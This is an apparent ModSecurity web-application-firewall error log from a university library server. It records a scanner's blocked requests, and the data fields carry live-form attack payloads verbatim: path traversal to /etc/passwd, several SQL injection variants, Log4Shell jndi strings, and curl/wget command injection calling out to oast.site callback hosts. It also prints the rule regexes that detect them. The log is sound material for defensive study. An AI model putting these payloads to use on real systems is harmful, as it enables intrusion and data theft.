[Tue Aug 29 11:31:15.363286 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10k8Co-f0AAAQIS7oAAAAq"]
[Tue Aug 29 11:31:16.647250 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAO88AsAAAAF"]
[Tue Aug 29 11:31:17.319588 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAP5mHcAAAAM"]
[Tue Aug 29 11:31:17.322647 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAPMmHgAAAAY"]
[Tue Aug 29 11:31:17.356756 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAOKNvcAAAAK"]
[Tue Aug 29 11:31:18.332213 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlgsnq59y9fe1bcm.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAO88A8AAAAF"]
[Tue Aug 29 11:31:18.350244 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAOM4d8AAAAU"]
[Tue Aug 29 11:31:20.374098 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAPRNgoAAAAf"]
[Tue Aug 29 11:31:22.468405 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "perpustakaan.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAPDn6EAAAAP"]
[Tue Aug 29 11:31:23.327268 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAP@Mx4AAAAZ"]
[Tue Aug 29 11:31:24.582816 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgxexfcic1qn4n5.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQOv1QAAAAw"]
[Tue Aug 29 11:31:25.335372 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgw7g7xjz3b319d.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQFcR8AAAAn"]
[Tue Aug 29 11:31:26.713737 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgnaqqn1kaz4g71.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQR45UAAAAz"]
[Tue Aug 29 11:31:27.335455 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAPDn6YAAAAP"]
[Tue Aug 29 11:31:28.638019 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10oMCo-f0AAAP@MzIAAAAZ"]
[Tue Aug 29 11:31:29.307509 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQSWMIAAAA0"]
[Tue Aug 29 11:31:29.492883 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQDFToAAAAl"]
[Tue Aug 29 11:31:29.535306 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQR450AAAAz"]
[Tue Aug 29 11:31:30.295275 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10osCo-f0AAAQEGJAAAAAm"]
[Tue Aug 29 11:31:30.347578 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQLDAEAAAAt"]
[Tue Aug 29 11:31:31.308304 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgf4yup8md8z3jb.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAP6NOQAAAAQ"]
[Tue Aug 29 11:31:32.381073 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQJWtYAAAAr"]
[Tue Aug 29 11:31:33.455265 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQKOcIAAAAs"]
[Tue Aug 29 11:31:33.501304 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlggwd9n9dr44m1k.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQEGJkAAAAm"]
[Tue Aug 29 11:31:34.554935 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQEGK0AAAAm"]
[Tue Aug 29 11:31:35.394409 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQkBV8AAAAC"]
[Tue Aug 29 11:31:36.321169 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgjk1qixey4c8t9.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAP@M0oAAAAZ"]
[Tue Aug 29 11:31:36.356817 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAP@M0sAAAAZ"]
[Tue Aug 29 11:31:37.338735 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAN@5HIAAAAO"]
